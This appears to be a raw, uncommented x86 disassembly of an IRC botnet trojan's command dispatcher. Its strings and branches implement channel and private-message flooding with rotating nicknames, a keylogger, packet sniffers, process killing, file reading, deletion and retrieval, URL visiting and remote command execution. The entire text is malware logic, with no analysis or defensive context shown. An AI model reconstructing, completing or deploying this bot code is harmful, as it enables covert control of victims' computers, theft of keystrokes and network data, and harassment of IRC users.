lea eax, [ebp+Dst]
push offset aPartS ; "part %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
loc_40511F: ; CODE XREF: sub_401CC7+342A�j
; sub_401CC7+3435�j
push [ebp+Source] ; Str2
push offset aPartflood ; "partflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405163
mov eax, [ebp+esi+Format]
cmp eax, ebx
jz short loc_405163
push offset aCyber ; "CYBER"
push eax
lea eax, [ebp+Dst]
push offset aPartSS ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
loc_405163: ; CODE XREF: sub_401CC7+3469�j
; sub_401CC7+3474�j
push [ebp+Source] ; Str2
push offset aPnick ; "pnick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4051DC
cmp [ebp+esi+Format], ebx
jz short loc_4051DC
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+var_17B4]
push edx
push [ebp+esi+Format]
push offset aSI ; "%s%i"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+var_17B4]
push eax
lea eax, [ebp+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
loc_4051DC: ; CODE XREF: sub_401CC7+34AD�j
; sub_401CC7+34B6�j
push [ebp+Source] ; Str2
push offset aJoinPart ; "join/part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405329
cmp [ebp+esi+Format], ebx
jz loc_405329
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS_0 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
lea eax, [ebp+Dst]
push offset aCyber ; "CYBER"
push [ebp+esi+Format]
push offset aPartSS_0 ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
call _rand
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS_1 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
call _rand
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber ; "CYBER"
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPartSS_1 ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aJoinS_2 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
call _rand
cdq
mov ecx, 0C8h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber ; "CYBER"
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPartSS_2 ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
loc_405329: ; CODE XREF: sub_401CC7+3526�j
; sub_401CC7+3533�j
push [ebp+Source] ; Str2
push offset aDcc ; "dcc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4053C3
cmp [ebp+esi+Format], ebx
jz short loc_4053C3
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+Dst]
push edx
push [ebp+esi+Format]
push offset aPrivmsgS_0 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 24h
loc_4053C3: ; CODE XREF: sub_401CC7+3673�j
; sub_401CC7+3680�j
push [ebp+Source] ; Str2
push offset aNick_0 ; "nick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4054C5
mov eax, [ebp+esi+Format]
cmp eax, ebx
jz loc_4054C5
push eax
lea eax, [ebp+Dst]
push offset aJoinS_3 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
lea eax, [ebp+var_4BC]
push eax ; Dest
call sub_418650
add esp, 14h
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+Dst]
push offset aNickS_1 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
lea eax, [ebp+var_4BC]
push eax ; Dest
call sub_418650
pop ecx
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+Dst]
push offset aNickS_2 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
call _rand
cdq
mov ecx, 1F4h
idiv ecx
push edx
call edi ; Sleep
lea eax, [ebp+var_4BC]
push eax ; Dest
call sub_418650
pop ecx
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+Dst]
push offset aNickS_3 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
loc_4054C5: ; CODE XREF: sub_401CC7+370D�j
; sub_401CC7+371C�j
push [ebp+Source] ; Str2
push offset aChgnick ; "chgnick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40550C
lea eax, [ebp+var_1808]
push eax ; Dest
call sub_418650
pop ecx
lea eax, [ebp+var_1808]
push eax
lea eax, [ebp+Dst]
push offset aNickS_4 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
loc_40550C: ; CODE XREF: sub_401CC7+380F�j
push [ebp+Source] ; Str2
push offset aMsg ; "msg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4055FB
cmp [ebp+esi+Format], ebx
jz loc_4055FB
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS_4 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
lea eax, [ebp+Dst]
push offset aCyber_0 ; "CYBER"
push [ebp+esi+Format]
push offset aPrivmsgSS_0 ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
call _rand
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgSS_1 ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
call _rand
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgSS_2 ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
loc_4055FB: ; CODE XREF: sub_401CC7+3856�j
; sub_401CC7+3863�j
push [ebp+Source] ; Str2
push offset aNotice_2 ; "notice"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4056EA
cmp [ebp+esi+Format], ebx
jz loc_4056EA
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS_5 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
lea eax, [ebp+Dst]
push offset aCyber_0 ; "CYBER"
push [ebp+esi+Format]
push offset aNoticeSS_2 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
call _rand
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_3 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
call _rand
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_4 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
loc_4056EA: ; CODE XREF: sub_401CC7+3945�j
; sub_401CC7+3952�j
push [ebp+Source] ; Str2
push offset aCtcp ; "ctcp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405801
cmp [ebp+esi+Format], ebx
jz loc_405801
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS_6 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgS_1 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aPrivmsgS_2 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aPrivmsgS_3 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aPrivmsgS_4 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
loc_405801: ; CODE XREF: sub_401CC7+3A34�j
; sub_401CC7+3A41�j
push [ebp+Source] ; Str2
push offset aMix ; "mix"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405927
cmp [ebp+esi+Format], ebx
jz loc_405927
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset aJoinS_7 ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgS_5 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_5 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgSS_3 ; "PRIVMSG %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_6 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
loc_405927: ; CODE XREF: sub_401CC7+3B4B�j
; sub_401CC7+3B58�j
push [ebp+Source] ; Str2
push offset aRegister ; "register"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40596D
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_40596D
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNickservRegist ; "nickserv register %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_4182F9
add esp, 14h
loc_40596D: ; CODE XREF: sub_401CC7+3C71�j
; sub_401CC7+3C7C�j
push [ebp+Source] ; Str2
push offset aOff_0 ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40653E
mov edi, offset dword_4EC244
loc_405989: ; CODE XREF: sub_401CC7+3CE1�j
cmp dword ptr [edi-4], 1
jnz short loc_40599C
mov eax, [edi]
cmp eax, ebx
jbe short loc_40599C
push eax
call dword_4E3190 ; closesocket
loc_40599C: ; CODE XREF: sub_401CC7+3CC6�j
; sub_401CC7+3CCC�j
add edi, 210h
cmp edi, offset dword_4F2964
jl short loc_405989
cmp [ebp+var_8], ebx
jnz loc_40653E
push ebx ; int
push [ebp+var_4] ; int
push offset unk_4417CC ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
jmp loc_40653E
; ---------------------------------------------------------------------------
loc_4059D2: ; CODE XREF: sub_401CC7+318F�j
mov edi, [ebp+arg_8]
push edi ; Str2
push offset aNick_1 ; "nick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A1A
push edi ; Str2
push offset aN ; "n"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A1A
push edi ; Str2
push offset aJoin_0 ; "join"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4099F3
push edi ; Str2
push offset aJ ; "j"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4099F3
push edi ; Str2
push offset aPart_2 ; "part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4099D3
push edi ; Str2
push offset aPt ; "pt"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4099D3
push edi ; Str2
push offset aRaw ; "raw"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409997
push edi ; Str2
push offset aR_2 ; "r"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409997
push edi ; Str2
push offset aKillthread ; "killthread"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409897
push edi ; Str2
push offset aK ; "k"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409897
push edi ; Str2
push offset aC_quit ; "c_quit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4097E9
push edi ; Str2
push offset aC_q ; "c_q"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4097E9
push edi ; Str2
push offset aC_rndnick ; "c_rndnick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40978B
push edi ; Str2
push offset aC_rn ; "c_rn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40978B
push edi ; Str2
push offset aPrefix ; "prefix"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409772
push edi ; Str2
push offset aPr ; "pr"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409772
push edi ; Str2
push offset aOpen ; "open"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409744
push edi ; Str2
push offset aO ; "o"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409744
push edi ; Str2
push offset aServer_5 ; "server"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409727
push edi ; Str2
push offset aSe ; "se"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409727
push edi ; Str2
push offset aDns ; "dns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4096B6
push edi ; Str2
push offset aDn ; "dn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4096B6
push edi ; Str2
push offset aKillproc ; "killproc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409686
push edi ; Str2
push offset aKp ; "kp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409686
push edi ; Str2
push offset aKill ; "kill"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409627
push edi ; Str2
push offset aKi ; "ki"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409627
push edi ; Str2
push offset aDelete ; "delete"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4095EB
push edi ; Str2
push offset aDel ; "del"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4095EB
push edi ; Str2
push offset aGet_3 ; "get"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4094FF
push edi ; Str2
push offset aGt ; "gt"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4094FF
push edi ; Str2
push offset aList ; "list"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4094DD
push edi ; Str2
push offset aLi ; "li"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4094DD
push edi ; Str2
push offset aVisit ; "visit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4093E9
push edi ; Str2
push offset aV ; "v"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4093E9
push edi ; Str2
push offset aMirccmd ; "mirccmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4093B2
push edi ; Str2
push offset aMirc ; "mirc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4093B2
push edi ; Str2
push offset aCmd ; "cmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409348
push edi ; Str2
push offset aCm ; "cm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409348
push edi ; Str2
push offset aReadfile ; "readfile"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4092CB
push edi ; Str2
push offset aRf ; "rf"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4092CB
push edi ; Str2
push offset aPsniff ; "psniff"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405E6F
push [ebp+Source] ; Str2
push offset aOn ; "on"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405E35
push 20h
call sub_40B99E
test eax, eax
pop ecx
jle short loc_405D5F
push offset dword_441DE8
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_405D5F: ; CODE XREF: sub_401CC7+408C�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+Format]
mov [ebp+var_EC4], eax
mov eax, [ebp+var_4]
mov [ebp+var_E3C], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_E38], eax
jnz short loc_405DA1
mov esi, offset a2_1 ; "#2"
push offset byte_4E2FA4 ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405DA1
mov esi, [ebp+Format]
loc_405DA1: ; CODE XREF: sub_401CC7+40BC�j
; sub_401CC7+40D2�j
push esi ; Format
lea eax, [ebp+var_EC0]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push offset asc_441E08 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 20h ; int
push eax ; Source
call sub_40B756
add esp, 14h
mov [ebp+var_E40], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_EC4]
push ebx
push eax
push offset sub_412A56
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_E40]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_405E24
loc_405E0E: ; CODE XREF: sub_401CC7+415B�j
cmp [ebp+var_E34], ebx
jnz loc_408506
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_405E0E
; ---------------------------------------------------------------------------
loc_405E24: ; CODE XREF: sub_401CC7+4145�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_441E38
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_405E35: ; CODE XREF: sub_401CC7+407C�j
push [ebp+Source] ; Str2
push offset aOff ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_408506
push ebx
push 20h
call sub_40B951
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405E65
push eax
push offset dword_441E78
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_405E65: ; CODE XREF: sub_401CC7+4191�j
push offset dword_441EB4
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_405E6F: ; CODE XREF: sub_401CC7+4065�j
push edi ; Str2
push offset aSniffer ; "sniffer"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405FC1
push [ebp+Source] ; Str2
push offset aOn_0 ; "on"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405F87
push 21h
call sub_40B99E
test eax, eax
pop ecx
jle short loc_405EB1
push offset unk_441EEC
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_405EB1: ; CODE XREF: sub_401CC7+41DE�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+Format]
mov [ebp+var_FEC], eax
mov eax, [ebp+var_4]
mov [ebp+var_F64], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_F60], eax
jnz short loc_405EF3
mov esi, offset a2_1 ; "#2"
push offset byte_4E2FA8 ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405EF3
mov esi, [ebp+Format]
loc_405EF3: ; CODE XREF: sub_401CC7+420E�j
; sub_401CC7+4224�j
push esi ; Format
lea eax, [ebp+var_FE8]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push offset asc_441F0C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 21h ; int
push eax ; Source
call sub_40B756
add esp, 14h
mov [ebp+var_F68], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_FEC]
push ebx
push eax
push offset sub_4130E1
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_F68]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_405F76
loc_405F60: ; CODE XREF: sub_401CC7+42AD�j
cmp [ebp+var_F5C], ebx
jnz loc_408506
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_405F60
; ---------------------------------------------------------------------------
loc_405F76: ; CODE XREF: sub_401CC7+4297�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_441F3C
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_405F87: ; CODE XREF: sub_401CC7+41CE�j
push [ebp+Source] ; Str2
push offset aOff_1 ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_408506
push ebx
push 21h
call sub_40B951
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405FB7
push eax
push offset unk_441F7C
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_405FB7: ; CODE XREF: sub_401CC7+42E3�j
push offset unk_441FBC
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_405FC1: ; CODE XREF: sub_401CC7+41B7�j
push edi ; Str2
push offset aIdent ; "ident"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_406096
push [ebp+Source] ; Str2
push offset aOn_1 ; "on"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40605C
push 2
call sub_40B99E
test eax, eax
pop ecx
jle short loc_405FFF
push offset dword_441FF8
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_405FFF: ; CODE XREF: sub_401CC7+432C�j
lea eax, [ebp+Dst]
push offset asc_442018 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 2 ; int
push eax ; Source
call sub_40B756
add esp, 14h
mov esi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push esi
push offset sub_410C7D
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_45602C[esi], eax
jnz loc_408506
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_442044
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_40605C: ; CODE XREF: sub_401CC7+4320�j
push [ebp+Source] ; Str2
push offset aOff_2 ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_408506
push ebx
push 2
call sub_40B951
pop ecx
cmp eax, ebx
pop ecx
jle short loc_40608C
push eax
push offset dword_44207C
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_40608C: ; CODE XREF: sub_401CC7+43B8�j
push offset dword_4420B4
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_406096: ; CODE XREF: sub_401CC7+4309�j
push edi ; Str2
push offset aKeylog ; "keylog"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_406211
mov edi, [ebp+Source]
push edi ; Str2
push offset aOn_2 ; "on"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_406108
push edi ; Str2
push offset aFile ; "file"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_406108
push edi ; Str2
push offset aOff_3 ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_408506
push ebx
push 23h
call sub_40B951
pop ecx
cmp eax, ebx
pop ecx
jle short loc_4060FE
push eax
push offset dword_442174
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_4060FE: ; CODE XREF: sub_401CC7+442A�j
push offset dword_4421B0
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_406108: ; CODE XREF: sub_401CC7+43F6�j
; sub_401CC7+4407�j
push 23h
call sub_40B99E
test eax, eax
pop ecx
jle short loc_40611E
push offset dword_4420E8
jmp loc_40717F
; ---------------------------------------------------------------------------
loc_40611E: ; CODE XREF: sub_401CC7+444B�j
mov eax, [ebp+arg_4]
push edi ; Str2
mov [ebp+var_C5C], eax
mov eax, [ebp+var_4]
push offset aFile_0 ; "file"
mov [ebp+var_BD4], eax
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40614D
mov [ebp+var_BD0], 1
jmp short loc_406156
; ---------------------------------------------------------------------------
loc_40614D: ; CODE XREF: sub_401CC7+4478�j
mov eax, [ebp+var_8]
mov [ebp+var_BD0], eax
loc_406156: ; CODE XREF: sub_401CC7+4484�j
mov esi, [ebp+esi+Format]
cmp esi, ebx
jnz short loc_40617D
mov esi, offset a2_0 ; "#2"
push offset byte_4E2FAC ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40617D
mov esi, [ebp+Format]
loc_40617D: ; CODE XREF: sub_401CC7+4498�j
; sub_401CC7+44AE�j
push esi ; Format
lea eax, [ebp+var_C54]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push offset asc_442110 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 23h ; int
push eax ; Source
call sub_40B756
add esp, 14h
mov [ebp+var_C58], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C5C]
push ebx
push eax
push offset sub_412775
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_C58]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_406200
loc_4061EA: ; CODE XREF: sub_401CC7+4537�j
cmp [ebp+var_BCC], ebx
jnz loc_408506
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4061EA
; ---------------------------------------------------------------------------
loc_406200: ; CODE XREF: sub_401CC7+4521�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_442134
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_406211: ; CODE XREF: sub_401CC7+43DE�j
push edi ; Str2
push offset aNet ; "net"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4064EA
cmp dword_4E31C8, ebx
jz short loc_406240
cmp dword_4E31F0, ebx
jz short loc_406240
push offset unk_442358
jmp loc_408850
; ---------------------------------------------------------------------------
loc_406240: ; CODE XREF: sub_401CC7+4565�j
; sub_401CC7+456D�j
cmp [ebp+var_C], ebx
jz loc_406F59
mov edi, [ebp+esi+Format]
mov [ebp+Src], ebx
cmp edi, ebx
jz short loc_406265
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
mov [ebp+Src], eax
pop ecx
loc_406265: ; CODE XREF: sub_401CC7+458E�j
push [ebp+Source] ; Str2
push offset aStart ; "start"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4062BF
cmp edi, ebx
jz short loc_406293
push [ebp+Src]
push 3
call sub_41958E
pop ecx
pop ecx
push eax
push offset aS_3 ; "%s"
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_406293: ; CODE XREF: sub_401CC7+45B3�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_419828
add esp, 0Ch
test eax, eax
jz short loc_4062B5
push offset unk_4421EC
jmp loc_408850
